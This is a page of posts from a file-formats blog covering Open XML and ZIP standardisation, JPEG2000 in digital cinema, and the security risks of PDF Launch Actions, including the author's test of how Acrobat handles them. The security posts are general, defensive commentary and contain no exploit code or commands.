File Formats Blog

Rick Jeliffe argues that Open XML needs more work before it becomes an ISO standard.

Labels: XML

# posted by Gary McGath @ 12:25 PM 0 comments

A week ago, I raised the question of risks in PDF documents. That got me wondering about the risks involved in Launch Actions, so I put together a handmade PDF that contained a Launch Action triggered by viewing a page. If this launch happened unimpeded, it could be a serious security risk, as malware could deliver a one-two punch by first delivering an executable and then getting a PDF reader to launch it.

In the testing I've done so far, all versions of Acrobat Reader which I've tried simply ignore the launch action. The JavaScript setting seems to have no effect. A full version of Acrobat for Mac OS X offered to launch the program I selected, but first put up a warning that asked me whether I wanted to proceed.

However, nothing in the PDF spec requires a warning, so it's possible that some readers will blindly launch whatever is asked for. These may not be common enough for malware creators to consider them worth exploiting. If you're interested in experimenting with it, the file is here. It will merely attempt to launch C:\\WINDOWS\\system32\\cmd.exe, so it's harmless even if the launch goes through.

Labels: PDF

# posted by Gary McGath @ 2:14 PM 0 comments

As reported on the Open XML Formats blog, the US has voted to approve Open XML as an ISO standard. This isn't the final word, but it's a major step toward approval.

Labels: XML

# posted by Gary McGath @ 2:04 PM 0 comments

Adobe has said that PDF documents attached to spam pose no security risk. Adobe certainly would like this to be true, but any such claim needs to be examined with skepticism.

The PDF spec includes a "Launch" action which can be triggered by clicking on something harmless-looking, or just by moving to a page. Parameters can be provided to the application, giving the launching document a lot of flexibility. A spam mail which contains two attachments, a PDF document and an EXE file which it launches, could be a deadly combination.

In addition, arbitrary media types can be embedded in a PDF file. These will be played (to use Adobe's generic term) only if the PDF reader supports them, but vulnerabilities in standard libraries for any of these media can become vulnerabilities in PDF.

The standard advice is the right advice: Don't open attachments from untrusted sources.

Discussion of some risks in PDF is available here. The claim that disabling JavaScript in the PDF reader prevents launch actions is not correct; launch actions can be used without JavaScript.

Labels: PDF

# posted by Gary McGath @ 12:38 PM 0 comments

JPEG2000 has found a niche in digital cinema, strengthened by Digital Cinema Initiative's approval of the JPEG2000 based DCI specification 1.1 for distribution of digital movies to theatres. Transformers and Harry Potter and the Order of the Phoenix are among the movies that have already been released in JPEG2000.

Labels: JPEG

# posted by Gary McGath @ 12:20 PM 0 comments

Rick Jeliffe discusses why there should be an ISO standard for ZIP. It's really surprising that there isn't, given how many different formats ZIP compression is a component of. The PKWare definition of ZIP is merely referenced by ODF and Open Office. The specification looks pretty good, though of course a fine-toothed comb is necessary to find any ambiguities. It designates some fields as "Reserved for use by PKWARE," which is undesirable in a vendor-neutral format. The description of spanning and splitting is rather ad hoc; spanning requires "writing each segment to a unique removable medium" and giving them all the same name. I'm sure there are other things that could be cleaned up.

Labels: ZIP

# posted by Gary McGath @ 10:02 AM 1 comments

Possibly of interest to people around Massachusetts:

Second Annual Digital Library Conference and Vendor Fair
October 25, 2007
Hogan Center, College of the Holy Cross
Worcester, Massachusetts

# posted by Gary McGath @ 9:41 AM 0 comments